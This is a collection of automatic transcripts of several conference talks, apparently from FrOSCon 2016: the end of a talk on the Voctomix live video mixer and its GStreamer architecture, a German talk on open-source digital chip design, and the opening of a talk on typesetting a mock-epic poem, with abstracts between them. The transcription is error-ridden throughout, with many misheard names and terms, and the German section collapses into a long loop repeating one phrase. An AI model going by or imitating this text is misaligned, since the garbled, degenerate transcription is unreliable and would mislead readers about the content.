have in mind what happens underneath and that it builds these threads for you and they are blocking each other. And then there's another thing that you need to think about. It's this iOS on shutdown. It's also new. And what it does is it tells that when you kill this running program, you can take this Kombatlinen and run it on your Linux computer and it will produce you a nice mp4 file. But if you kill it, usually what happens is it kills all threads. But the problem is that the mp4 is then broken. It doesn't work. Because an mp4 has in the start of the file an index. And in order to be able to write that, it needs time to do this. So what we now enforce is that when you kill the program, it sends an end of stream signal through the pipeline and tells everything, okay, your inputs are now dead, please finish your work. And it's another thing that you have to know. And if you don't know it, you might wonder why. Because maybe sometimes the file works and sometimes it doesn't. So to take you a little deeper into the rabbit hole, I have basically now on the screen what is Voktomix in its inner core. It's video sources. And it's a compositor. Compositor is a special element in G-Streamer that allows you to aggregate multiple video streams on top of each other and beneath each other. And like here, we are positioning it 50 from the top and scaling it to a special size and also setting some alpha channel. And compositor will build for you an image, like applying other sources on top of each other. And this is basically the only element that Voktomix is in the core. It's just a compositor for the video and we have a similar element for the audio. And everything around is just to support this one pipeline. So we are using here some video test sources with different patterns so we can see which source is which and they don't look both the same. And we have this compositor I just talked about, which aggregates these video streams. And it's exactly, that's nearly exactly the pipeline that's running in Voktomix. But there's one problem here. When we look at this slide, it's still one process. Okay, it has two queues so there are three threads running, but it's still one process. What happens if one of these sources gets terminated? It's a video test source, it won't get terminated, but if it's a real world source, what happens then? Sources are unreliable. So, because we are now coming back from the G-Streamer into the real world, we have things like cables and we have people who unplug them. And there are power plugs and there are people who think, oh, I might charge myself on here. Who does need a camera? And another thing is that in a room like this, the requirements may change. Maybe someone says, okay, I have hardware here to show and we need a new camera here. And then we just plug one out in the other room and take it here and install it here and drive a cable back. But after the talk, we will maybe move the camera back. So, there is naturally changes in the setup we are running. You can't rely on the sources to be there. Sometimes there's network in between and network is unreliable, of course. And G-Streamer, and especially a single G-Streamer Pipeline is a static construct. You set it up, you start it and then it runs. And if one thing of this pipeline has a problem, then the whole pipeline and the whole G-Streamer process will be terminated. And there are possibilities for dynamic changes. You can say, okay, I want to have a valve here and stop all data and then drain the end of the pipeline and then put another valve here and then cut out this piece of the pipeline. You can really think of it like a water pipeline system and then remove this piece and put a new one in and then refill the queues and then reopen this drain and then the rest of the pipeline will start. But doing this in a real-time situation where we have multiple cameras and someone just unpacked the camera and plugged it back is just not viable. It didn't work. I tried that, but it didn't work. It didn't work good enough to catch all these events and errors and all the places and put valves everywhere you need it. So, we need something different. If we have a setup like this, a source, a voctimix and then maybe recording or something else, we need something in between. We need a blocking barrier there, something that allows the camera to run on a different speed, maybe go away, maybe come back or have the core go away or maybe come back, run at a different speed, while both do not block each other. So, there are things in G-Streamer that allow you to do that. There are the inter-element. They are nice reusing them. Right now, they are running here. They are working like a clutch between the sources and the core. And they are also working in the same way between the core and the things because things are also unreliable. There are spinning metal and spinning metal may crash or network may go down or something. And we do not want the core to terminate when one of the sources or things passes away. But the inter-element, well, yeah, they give a shit about time-stamping. So they are assuming that time is a linear thing and physics is perfect and every crystal in every device is running the same speed. And obviously, that is not true. So we have cameras and they drift and they drift with temperature and yeah, it basically screws up audio-video sync. And it really does this from the second you start them. But just a little, just a little until something happens. Like for example, you forget to stop an encoding process and your CPUs get overloaded and do more than they should. Then it audio-video drifts for minutes sometimes. So they are obviously not good. We do not want to keep using them. But currently, they are in Rock2Pics. And they are one of the biggest challenge we are facing because they are the main source for the sometimes little perceived instability that Rock2Pics has. So sometimes you have to restart it and restart it again. And they are one of the problems. So we started a rewrite a year ago. And it is a complicated thing because GStrummer internally is built with GObject. I do not know if someone of you have already touched GObjects. It is basically object-oriented programming in C. Which is basically not such a good idea. But okay, it is the format they are using. And then we are exporting these objects into Python. So it works. But we could use a little help there. It is really a thing of talking about how is the timing working. I have no background in these topics. It is all new to me. And I have to really turn my head around how timing is working. How first-in-ford, first-out-buffers could be working between processes and in-between queues. And I would really love to talk to somebody who has more background in these topics. So if you would like to talk about this, please come to me after the talk. And we will have a nice discussion. We have beer in the C3 Rock. So it will be a nice discussion, I hope. But for those who say, oh, this deep technical thing, the good news is you have it over. And we will now take a look into the fun stuff. Like how is Voktomics looking? What is it doing? And how can you use it in your alpha, in your, well, where you would like to record talks? So first, let's take a look at how people watching from the external side are seeing what Voktomics produce. So let's take a look on which composition modes we implemented. And you may say, hey, I know these Blackmagic devices or some other Vision Mixers. You can't produce any composition you want, and that's right. But you can't do with Voktomics. Vision Mix has a really small amount of variation it can give you in the result of your video. And this is one of the things we are shooting for, because we do not want, I'm sorry, we do not want the mixer engines to be able to screw up our video recording by falling asleep on the keyboard. And now the camera is right there, and most of the screen is empty. And we have seen that. We're moving around the video, like picture in picture, all over the slides, because hey, look, I can direct that. People have been doing that on Congresses. So we do not want them to be able to do such things. So we have a fixed amount of composition modes that we can produce. The easiest one is, for example, fullscreen. Just have a camera, maybe have a slide, maybe have a fullscreen. It's easy. Another thing we can do is picture in picture. Have a slide in big, and maybe a camera down below. Maybe have it at the other right round. If the speaker is talking really long and the slide is really boring, you might have the speaker in big, because he's interesting, maybe, and have the slides in small. Then we have views like this. It's one we use often, I think. It's one video in big, and one in small, and they both overlap a bit. You can configure them. You can say, okay, how big do I want this to be? How big should this be? How should it be placed? But it's a configuration option. You configure it when you start the Vokamix Core. The mixer angel is not able to change that. All your videos you produce will look the same, and we want that on a conference like this. We do not want one of the talks have this image here, and one have it in the middle, and then one above the logo that doesn't compute for us. So this is one of the views we use often. And then we also have this. If you can't decide which piece is more important, you can have them both equally sized. If this is not enough for you, and you say, okay, I want something more complex, I want three video sources in the same, okay, it's possible. It's just the compositor element that do this aggregation, and it can do two or three or five sources. But you have to change the code. It's not what Vokamix is made for. It's made to serve exactly what we need at the C3Rock. And that may be a problem for some of you. We'll say, okay, I want to do VJing, and I do not want this. I want something else. I would encourage you to take a look into the source code. It is not complicated. It's really, the amount of source code Vokamix carries, I would say that later again, is you can read it in a weekend, and completely understand what it does, from the beginning to the end, everything. And then you can change things. And in order to give you the possibilities to closer understand what Vokamix already does and what it, maybe you can do with it. The next thing I would like to look on with you is how we configured our inputs, our outputs, and how they are combined. So this is an excerpt of the readme. And I would like to talk you through some of the things here. The obvious things are audio-video sources. They are obviously in the middle. It's the main sources we have. It's a camera, maybe a second camera. It's the speaker slide input. This is the read your sources that are our content. And they both contain audio and video. Yeah, okay, the speaker, some of the time doesn't have audio, but sometimes they play audio back via hardme. And we want that to be part of our pipeline too. Then there is, it's like a block diagram. Then we have the mirror port, which basically gives you everything you get in out. But there is this inter-element in between. So you are assured that the mirror port will continue delivering video even if your source breaks away. So if you unplug the camera, you will get black video. And if you plug it back, the image will come back. Why is this important? We, for example, use this to make a backup recording, or we could use this, to make a backup recording of just the slides, to have a video recording of just the slides. Maybe this is useful. We could use that to have a stream with just the slides. But multiple view cameras, we talked about that on the Congress to have the ability, like in big football games, to change your view of the stage in real time in the website. You can use these parts to do stream encoding of audio input separately without the mixing angel interfering with the streams. Then we have these things. They have an asterisk, and they do not always exist. The reason for them to exist is because in our setup, and if you want to learn more about that, please take a look at the presentation that our team gave last year. The link is in the beginning of the presentation. We have two computers doing all this. We have one, which is running all the video inputs and the Voktor core and all the heavy lifting and all the encoding. And then we have this notebook. In between those devices, there is a finite bandwidth link. There is a gigabit link. And one HD video stream without compression is like 900 megabits. So one of them would saturate this gigabit link. And it obviously doesn't work to have all inputs sent to the notebook via a single gigabit link. So we have to compress them down on the Voktor core so we can send them over to the mixer notebook. And this is basically what these ports are, they are compressed down versions of the mirror port, which you can take, use to take a look onto what's coming in the Voktor core with your computer from the network. So then we have these main mixers. We took a look at the pipelines that run in this video mixer. It's basically a compositor. It's just that. It's some inter-element piping into compositor and piping out again. The audio mixer is basically the same. It can have multiple audio inputs and you could adjust the levels of all of them. But currently we're just selecting one with audio level 100% and every other channels are at zero. But you could use this to simulate like a small audio rack and say, okay, I want the speaker to be this loud and his audio from the notebook to be this loud and do it all in Voktor core. So next we have these sources here and you might have seen it in the slides before. If you combine video, there is sometimes a backdrop, some place where no video is. And yeah, you could just have it black, but it looks some kind of ugly. And we said we want to have a looping video in the background behind our small images placed on the canvas. So this is the place where you can play in this video. And when talking about this, one thing that might spring into your mind is, okay, Voktor Mix actually does not any kind of reading video files or writing them. It just merely accepts video from sources and sends them out. So even the background loop that you see behind the videos is produced by a third program running and piping the video data into Voktor Mix. And Voktor Mix is just doing the composition. There are reasons for this design. I will talk about that in a second because there are some other places where this gets important. Yeah, on the output, obviously there is our main output part. And there is basically the place where the mixed video and the mixed audio gets matched together and result in a final stream of all the mixed video and audio. And obviously there is the same encoder preview thing we had with the sources. And we have these things, the stream blanker. It's a feature that if you have made an video angel, you might have noticed you can say blank the stream. I talked about this in the beginning. If nothing is happening in the room, we do not want to stream an empty room. Or even worse, people running around here and having private conversations and because the microphone is lying on the desk, you have a live stream of them and it's not good. But on the other hand, if the mixer angel is asleep and he doesn't arrive and the speaker just begins talking, we do not want the recording to just show a still image. So we have built into Voktomix and it's another thing where you can see that Voktomix is really made for the situation we are in now. It's just made for this kind of recordings. We have the output part where our recording system is connected and then we have the stream blanker where our streaming system is connected. Und onto the stream blanker, you can either send the program view, the output view, or you can send another audio source or video sources. Because for example, you want to send a still image or a small animation that says nothing is happening in this room. Or you might want to send another loop that says something is happening, but we are not allowed to stream this. And maybe you want them to be different video loops. On the other hand, you might want to play some audio, some music. We have an audio loop, you might know that from the congresses, we basically play it everywhere. And these are the streams that are entering this video and audio source there. So to crunch it all together in some bullet points, the Voktor core only does the video mixing. It does nothing more. It does not encode. It does not decode. It does not stream. It does not have any sense of networking other than how it takes in its video inputs. And everything beside of that needs to be in other programs. So for example, sources and things are external scripts. There is a camera source. It is an FFM-Pack command running as a system D unit. And it reads from the Blackmagic grabber card and throws the reader to Voktomics. There is a slide source. It reads from this frame grabber here and throws the Voktomics. There is a recording sync. It takes Voktomics and codes it and writes it to files. And these are all separate processes. And most of them are not written by us. They are just configured. They are readily made programs like FFM-Pack. That just does that. And because of the setup, because of the separation of concerns, you have tons of options. You can say, okay, I do not want the recording to be made with FFM-Pack. I want it to be something else. I want that it is played out via HDMI. And then there is a hardware recorder. That is absolutely possible. You can do that. Or I want to stream it via SDI to another room and do the recording there. That is absolutely possible. You can do it whichever way you want. The Voktomics does not enforce the schema. And this is another thing that we actually plan when we are designing this. We want to be able to change things quickly. For example, here at Foscon in Room 7 and 8, we have a different frame grabbing setup. It is our beta test. If it works, we might roll it out in all rooms. So we are able to have two rooms be different configured than all the others while running the same software. Also the GUI is external. It can be on the same system, which needs obviously more CPU on the system. Or it can run on another computer, which also needs more CPU because you need to encode the video. But we are working on that. But having it on a notebook gives you more flexibility in placing things in the room. For example in Room 8, I think, our main encoder is somewhere underneath the speaker desk. And the mixer notebook is behind there. Here the mixer notebook is, I think, right beneath the camera. So both are just a meter away. You can place things in the room more easily if the GUI and the core are running on different systems with network in between. The numbers we just saw on this readme excerpt, these are actually TCP ports. And they take raw video frames, like just RGB, RGB, RGB, following byte by byte. Okay, not exactly RGB. We are using e420, some standard used in television, I'm not a television guy. And raw audio, like samples just in PCM encoding. And we place them into a Matroska container. And we do this because Matroska gives us timing information and metadata. It carries like how big are the frames? How many bytes will there be per frame and in which arrangement they are? And it gives us timing information. So, 10 does a frame match up with rich audio sample. But it's raw audio and raw video in Matroska in TCP. So it's like 800 megabits and we usually do it via loopback. So every source and sync is running on the same system and they're talking to each other via TCP loopback. Yeah, actually we should use Unix domain sockets there. Okay, got it. We will change that sometime. But using TCP and using this common format, it doesn't look that common, but it is, means that you can use VLC to watch your streams or FF Play or M-Encoder or any other Unix tool that is capable of reading Matroska and reading TCP. And if it doesn't use TCP, you can just use Netcat to send video and audio over. It's not a problem. We usually use Netcat to take a look at the video streams running on the encoder because it's just networking. It works. So to give some numbers, for the preview outputs we are currently doing JPEG encoding. We are just compressing every frame in JPEG and putting it together with the same 16 raw Lendian audio thingy in a Matroska container and sending it over to the GUI. And this is what the GUI shows. And if you are a video angel and you see some crystals, some snow in the GUI, this is from the JPEG encoding. But the recordings are usually much better quality. So now we have this core and it has sources and it has things and it has some understanding of its internal structure and it knows what we are doing with streaming and recording. But now we need a way to control it. So let's take a look at the control protocol, which you can speak to the Rock2Core to control it. And it's actually pretty simple. It's just a line-based TCP protocol. So you send a command like set videoA, camera1, and it responds with, okay, the video status is now camera1 and camera2. This is my R and this is my B port. Or you can say, okay, set the composite mode. So it's really easy to do actual mixing and you can easily do video mixing with Telnet. It's not a problem. It's like most of the time I'm testing. I'm using R, a rep, and Telnet and just writing the commands. But you can also cut remote via SSH. So we have situations where we are in the hotel and it's early and the first talk starts at like 8 o'clock and we are still nearly asleep. You can, of course, go down the lobby and while you're breakfasting, mix the talk. It's not a problem. It works. It's network. So you can, of course, cut via a mix via Netcat. And we are thinking, we have been thinking about implementing an HTTP layer. So we can actually have a web view of this. It's motionJPEG, so most browsers are able to show it and just open it in a web browser and have a Vokadoe there. That might be an interesting challenge for some of you to implement. And of course, it's scriptable. So during our tests, we had Vokamix running with a script, which changed the video mixing every five seconds. So we can test thoroughly all modes and all combinations. It's easy to script that. You can have an add task, which at 8 o'clock innev is the stream. It's not a problem. You can just line-based protocol. You can write your command, pipe Netcat, and be done. So let's take a look at the GUI. It comes so late in this talk because it's actually not important. I think it's really not that important, because it's just a thin wrapper around all the things, all the core things we just talked about. It has buttons for other modes, and it has video views. And that's it. And it's actually pretty shitty. So we are tweaking it every now and then a little bit, but I'm really not a user-interface guy. So if you would like to change that, the GUI is actually even smaller. It's maybe seven files or something, seven Python files. So if you want to change that and build your own GUI, it's easy. And the protocol is really simple, and all the communication stuff is already implemented. So looking into the future and the current state. Hopefully we'll get there. But until then, just a small list where we actually used Voktomics. We have a ton of conferences where we were and use Voktomic successfully. I hope none of them were a legacy TV switch, but I think they were all made with Voktomics. And yeah, obviously you are just in the middle of the biggest setup we have done so far with eight rooms. It's the biggest thing in the year. It's even bigger than in Congress. But as I told a little bit, we have also some connections to Australia, and they are running two conferences, and also Deppconf is planning to use Voktomics, and they were kind enough to package our software. So there are now packages in Debian and Ubuntu. I will talk about that in a second. But let's talk about the future plans. Well, I talked about it. I would really, really like to increase the stability and the reliability so that you just can turn it on and it works every time. It's not always like this. Sometimes it's ZEC falls on the startup, and you have to start it again, but then it works. But it's the thing where we need to work on. Dropping of slide sources is something. People are even in 2016 coming with four by three slides. Why? I don't understand that. We are producing all our videos in 16 by nine. So, I should know that. So, cropping the black borders would be a nice feature. Guy improvements, a good improvements, of course, I talked about that. A Flux compensator, like if someone forgets to turn off their screen reddening thing, the videos look really ugly, but it's actually, you could programmatically reverse this effect and recover the video. That would be a fun thing to work on. And it's a nice name for a feature. We want to increase the performance. We are running on i7 Intel CPUs, and the highest of them, like 4.2 GHz, and they have pretty much, they are quite loaded. But we have some things in the pipeline, like running video encoding on the GPUs, or doing more with OpenGL in terms of video format conversion and video compositing. But yeah, it's something we need to work on. Documentation is the thing. We have pretty good documentation. There is step by step guys on how to set them up. There are go to links for packages to download and just install. I think it should be not too hard to install it, but it always can be easier, especially putting your own sources into place. And yeah, the first impression that you have when installing it is currently not that good. You start it and it's all black because you have no sources, and then you need 20 scripts to put data in and out until you have a working setup. And we need to make that better. So some kind of installer who ask, hey, do you want some default setup? Should I install example sources for you? That would be pretty great. And it's also a good way to learn how the system works. If you want to do that, I would really appreciate that. So talking about what you can do. Well, there's code and it's Python. And it's there. And it's public and you can take a look at it. And I said it's really easy to read, I think. I try to keep it clean. I try to keep it structured. And the amount of code should be readable in a weekend, I think. There are three big parts. There's the core, which does all the video mixing. There's the GUI, which is pretty small, I showed it. And there are the example scripts. And the example scripts are really examples. But they are basically 99% identical to what we are running here. So these work for us. They might work for you. They might maybe not work for you. But they are a really good starting point, I think. If you say, hey, okay, I want to run it. Right after the talk, what should I do? Well, the first thing is you need a pretty recent version of G-Streamer. Because they have fixed a lot of bugs in the recent versions. I would recommend Debian Stretch, SID, or Vili. All three have the right G-Stream packages right there in the repositories. And you can just install them and use them. If you do not want to run any of these and are not willing to build your own G-Streamer version, you can run a Docker container that we provide. And it should work. I don't know. Give it a try. And for most, for some distributions, there are actually packages. The Debconf people were kind enough to package them for Debian. And Ubuntu has taken one of them. And yeah, I don't know. Googling around for Rock2Mix gives some results for packaging. Maybe someone wants to do that for Zuzo, or for Arch Linux, or for, I don't know what there is. Zuzo has packages. Fine. And yeah, if you have problems running Rock2Mix, then just come over to the C3Rock and say, hey, I want to talk to Matze in mind. I can't run Rock2Mix, and I will go with you and try to make you run the software and get you to a point where you can play around with it. I can't guarantee that I will get there, but I would be happy to have someone who helps me, who says, OK, I want to take a look at it. So if you're interested, just come around. And basically, that's it. If you have questions, you can ask them now. Please wait for the microphone or I will not answer your question. If you have questions later, you can join us on IRC. I am usually around there. We are doing a lot of communications through IRC. Or if it's not your way of communicating, please send an email to there. And yeah, I will think to come back to you pretty quick. So there's the first question. Thank you very much. A couple of questions. You are mentioning that basically the video streams are raw, which means that what will happen if in a situation when you have 1632 cameras, how is that going to work? I don't know if it's going to work. Usually we have one or two. So I have not tested it with 16 or 32 cameras. I would imagine that it will run in some problems with the kernel not being able to dispatch this amount of memory to the process. At this point, I think I have to repeat, it will not work for everyone and not for every situation. It is made for exactly such a setup. And if you have 16 cameras, then I think it might not be the right tool for you, unfortunately. Replace. It's capable of handling replays. Football streaming, for example. You can press a button and show the last three minutes of video. I think this would be something that you would do in an external script. So you would have to... I think you should be able to have a script that records your video and then you can say, okay, play me back the last three minutes into this input and then mix it back into your program stream. That should work. I think that should be possible to build. But it would not be a functionality of Octomics. It would be an external program, an external script and you can add buttons to the GUI to trigger custom scripts. But you would have to write the script and the recording and other things around, I think. Other questions. Okay. Dann thank you very much for your time and I hope you have a nice first time.
|
In 2014 the C3VOC decided, that it wanted to substitute DVSwitch as a Live-Video-Mixer Software with a HD-Capable solution. Two years later, the FrOSCon 2016 will be produced with Voctomix, our own Live-Video-Mixer System.
|
10.5446/32454 (DOI)
|
Danke für die Einführung. Das Mikro funktioniert insofern, dass das, glaube ich, nur für die Aufzeichnung ist. Ich werde laut genug versuchen zu reden, falls irgendwer was nicht versteht, laut klatschen oder sowas. Ich werde jetzt in Englisch zu sprechen, ob es jeder ist okay mit dem oder jemand, der nicht Englisch oder der andere nicht Deutsch hat. Ihr könnt also Ihre Frage fragen. Die Frage, die ich auf den ersten Schritt aufbaut, ist, wie du dir dein eigenes Kippen designest. Wir beginnen mit einer Geschichte. Eine Geschichte, die für die, die Software-Development machen, sehr familiar ist. Es ist eine Geschichte von Tom Leer, ein Mann, der eine DBA-Admin ist, die ein Database-Werk macht. Und ein Tag findet er einen wirklich weinen Query, der nicht einfach richtig läuft. Er ist für unruhige Gründe, dass er keine Ahnung ist, was eigentlich falsch ist. Er schaut an die Statistiken, die er bekommt, und der Query schaut allweil falsch. Er schaut aber an den Query, und es sollte fast sein. Er geht in den Steg, durch den ganzen DB-Steg, in den Kernel-Layer. Und in dem Ende, er sieht, dass der C-Code richtig sieht, das, was er hat, richtig sieht, ist nur langsam. Er däckert weiter, und er schaut an den C-Code, das er sieht. Er sieht, dass der Hotspot in seinem Database-Query wirklich eine Lange ist, der eine Menge Assemblerinstruktions- und wirrige Lübe rollen. Er weiß, dass er viel schneller machen könnte, wenn er ein bisschen Modifikation hat, als er das Prozessor hat. Er sagt, dass er kein Problem hat, aber er kann das Prozessor-Source-Code checken. Er macht einige Veränderungen, macht eine simple Simulation, macht es ein Pull-Request, und zwei Wochen später geht er zum Shop und bietet das neue Prozessor. Er sieht unrealistisch, ja, er macht es. Und es ist eigentlich in dem Namen dieser Leute. Ja, es funktioniert nicht so. Und die Frage ist, warum funktioniert es nicht so? Warum können wir Hardware- und Chip-Development machen? Eigentlich, weil wir Software-Development machen. Warum ist es so viel schneller, warum ist es so viel mehr sparser? Und das ist was wir heute schauen werden. Und ich beginne mit ein paar Worte, und ich sehe, dass ich in der Forderung des Slides stehe. Ich bin sorry, aber das Cat ist immer etwas irritierter. Aber es ist eine Frostkontradition, so muss es da sein. Ich beginne mit ein paar Worte. Die Worte, die ich heute am meisten benutze, ist das Digital Hardware-Design. Und ich benutze das Digital Hardware-Design, um es von einem non-digitalen Hardware-Design zu separieren. Ja, das ist ein PCB, das macht Dinge wie Maker, wo man Arduino-Boards, die man zusammenbaut, das Programm. Was wir heute schauen werden, ist das Digital Hardware-Design, das bedeutet, dass man deine eigenen Chips in den Ende createt, also physische Devices, das ist das, was wir hoffen. Das andere Termin, das wir benutzen, ist das Freie und Opensource Silikon. Ich glaube, das ist ein guter Kompromiss, um das Digital Hardware-Design zu erzielen, gegen das Digital Hardware-Design zu verbreiten. Und das Opensource-Design ist manchmal benutzt für das Chipsdesign, aber auch für das whole Maker-Area. Und ich versuche, das zu distinguieren, weil es einfach verblüht ist, weil die Techniken und die Kontrains, die wir haben, wenn wir Design sind, sehr anders. Ich weiß nicht, wie viele von euch, und das ist schwer zu reden, aber es ist nicht relevant, was eigentlich da ist. Wie viele von euch haben es ever redet oder geschrieben, ein sehr lockes Code, ein VHDL Code, ein systemverlockes Code, Dinge wie das? Ja, einfach raised your hand. Okay, 20%, 30%, so was. Für alle die anderen, also wir beginnen unser Design mit dem Source Code, wie wir das in Software-Development machen. Das Source Code ist eigentlich nicht das reale Source Code, aber das Design-Guy ist eigentlich ein Hardware-Design-Langu, das ist nicht ein Programm-Langu. Also, was du in dem Ende machst, ist, dass du dir das wie deine Transistors, die dein Chip aufmachen, connectiert oder wie sie in diesem Weg funktionieren. Du machst es auf ein bisschen höherer Level, aber du bist nicht auf einem so hohen Level, als wenn du ein C++-Basen programmierst, oder so. Also, für alle von euch, die nie von Hardware-Design haben, ich werde schnell durch das Design-Guy gehen, die Steppen, die du brauchen, von deinen Ideen, die du in das Source Code eröffnen kannst, zu dem finalen Chip. Und du startest auf der linken Seite mit deinen HDL-Sources, das ist tatsächlich ein Source Code, und du machst auch noch andere Librarien, die du von Verlangenen, von anderen Sources, und das ist auch IP-Kurs. Das ist ein weines Wort, weil Intellektual Property nicht wirklich intelligent ist, oder die Property von jedem, aber das ist das, was es ist. Und ja, das ist was, was wir mit dabei haben. Und was du in dem Ende hast, ist eigentlich dein Designprojekt, die Description von deinem Chip. Und dann hast du ein paar Werte, die du gehen kannst. Zuerst kannst du Simulationen, du kannst immer Simulationen machen, und das ist das, was du willst. Und was du getest, als Ausput des Simulations, ist ein schönes Versehen von viele Waiforms. Also hast du alle die Signale, die du in deinem System hast, und es ist nicht visibel, aber es ist auch, wenn du es auf der Schraube hast, nicht viel mehr verständlich ist. Also ist es wirklich, wirklich anerwartend. Aber das ist das Ausput, das du aus der Simulation gehst. Du sagst, das ist schön, das ist das, was ich immer wollte, um einen Blick zu haben, aber das ist nicht wirklich so satisfassbar. Das andere Weg ist, dass du die gleichen Sources und Synthesis machst. Das heißt, du gehst von dieser Description in dieser Programme-Language zu einer Netliste. Und eine Netliste ist eine Kollektion von, nicht nur Transistors, sondern auch Orgaits und so, die von Wires verbunden sind. Wenn du die Netliste hast, ist das ein Gratbeck von ungerätem Wires. Du hast einfach eine Fischnetze, die Dots und Orgaits sind in der Dots, die wirlich verbunden sind. Du hast diese wirrige Netze, die aus der Symptome kommt. Mit der Symptome kannst du den Netliste auf Silikon, oder du kannst auf eine FPGA programmieren. Wer hat das noch nie von FPGas gehört? Das ist eine große Fischnetze, das ist toll. FPGas ist eine Chesschenz, die du programmieren kannst. Sie haben hier eine fixe Fischnetze, und du kannst verschiedene Funktionale auf die Fischnetze bringen. FPGA ist sehr schön, weil es in der Ende ein reales Stück von Hardware gibt, also ein reales, black-schnitte, dass du etwas holst, und das hat deine Funktion, dass du programmiert hast. Auf der anderen Seite ist FPGas, besonders als sie größer sind, oder eher spät, wir haben eine Schau an. Auch die Klokrate und die Funktionale, die du auf FPGas erneut aufbauen kannst, sind also an einem standard FPGA in der regularen Preisangehörigen von ein paar Hundert Dollar, oder Euro, oder nicht Pounds, du kannst auf 200 MHz Spezien, das ist das, was du usually benutzt, und du kannst ein paar kleine CPU-Kurs programmieren, die sind so wie die Cortex M3-Kurs, so sehr klein, microcontroller-Kurs. In der Ende ist die FPGA-Implimitation, das ist der erste Teil der Chips. Unfortunately, diese Chips sind so wie die Bilder wir hier haben, dass es die Projekte auch besser ist als es in der Realität. Das ist all naturally gluten-frei, und sie advertieren diese Chips als die Servien von Vegetables. Ich habe nie das vorher gesehen, ich habe ein Pounds von Chips gegessen. Das sind die Chips, die du aus dem Kurs des Kurses willst. Für das musst du ein paar weitere Stipps machen, und wir haben auch das, und in der Ende ist das, was du kriegst, die Realität, die fett und salzig sind, und es braucht viel Arbeit, aber das ist das, was du willst. So, wir schauen uns an die Realität. Wir beginnen mit der Simulation. Was braucht du für ein Simulation und was ist das, was du für ein Chips-Design hast? Wie viel kann man mit den Open-Source-Tools machen? Wann braucht man eigentlich commercial Tools? Was ist das, was da ist? Für die Simulation braucht man eine Karte, und du musst ein Simulator machen. Du willst natürlich auch ein paar Testen machen. In der Software-Welt, wir haben viele Unit-Tests, die System-Tests, die man benutzt, und die Hardware-Welt, die im old V-Model-Style-Development sind, und das gibt gute Rezene für das, und wir haben auch einen Blick auf das. Testen ist ein bisschen anders in Hardware, als es in der Software ist. Aber wir beginnen mit der Karte. In der Karte gibt es zwei Programmen-Languages, die die Hardware-Description-Languages vorhanden sind. Wir haben Verilog, oder es ist ein neuer Version, für alle, die das System-Verilog haben, und haben sich gedacht, das ist das wehste, was das<|de|><|transcribe|> ist. Wir sind in einem System-Verilog, das ist ein guter Weg. Oder die HDL. Wenn du siehst, magst du Verilog, wenn du Pascal magst, dann magst du die HDL. Das ist das, wie die Languages sehen. Sie sehen beide sehr weh und old. Aber es gibt ein paar neue. Es gibt BlueSpec, das ist nicht weihlich. Es gibt Schüssel, das ist ein sehr interessantes System. Das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes, das ist ein sehr interessantes,
|
Buy hardware, write software -- this is the basic rule we in the FLOSS community followed for many years. But things are changing. Today it is easier than ever before to create own digital hardware, aka. "chips." In this talk I'll show give a introduction into what (in terms of tools, knowledge and other factors) is required to get a digital hardware design up and running. I'll also show how to get started: where can I find the community to get help and existing code? What existing projects can I contribute to?
|
10.5446/32455 (DOI)
|
Welcome, everyone, to the last session of the day. Next up is Ruben Thomas, who will be talking about the challenges in type setting probably, and getting your writings to come out beautiful on paper. Welcome. Thank you very much. I'll try not to keep you too long from your dinner. So I'll just say a few words about myself to try to explain what might be otherwise a rather perplexing talk. Even after you've read the introductory slide, I have what one might describe as something of a portfolio career. My main employer currently is the Roman Catholic Church. I sing in the choir of Westminster Cathedral in London. And before that, I spent the previous 30 years working for a spin-off, which was nationalised by the English government about 500 years ago, the Church of England. I studied computer science at Cambridge University. And just before that, I was fortunate enough at high school to have compulsory historical and literary studies, even though I mostly specialised in scientific subjects. But you'll see in a moment how that comes into the subject of the work I'm about to describe. So just to give you a quick outline of the talk, I've already given you some personal context. I'm then going to talk about a short, well, not quite so short, poem that I wrote many years ago. The bulk of the talk is about some technical matters that arose as a result of trying to typeset this poem in a particular way, which led me first into latex, and then into various parts of the free software universe. And then I'll end up by going a little bit philosophical and talking about how this relates to Larry Wool's cardinal virtues of the programmer, and also a word about proprietary software. So the central subject of this talk is a poem I wrote. It's not a very long poem. It's about 272 lines long, which is a lot shorter than, I don't know, the Odyssey. So a book of 40 pages, which so far, and I think I'm nearly finished, has taken me almost 24 years to write. And it's a satirical mock epic, which is almost entirely true, but footnoted, prefaced, and with a publishus forward that I've made up, which is a slightly unusual way around. And of course, the first question that one might reasonably ask after seeing that summary is, what on earth does this have to do with free software, even though it's 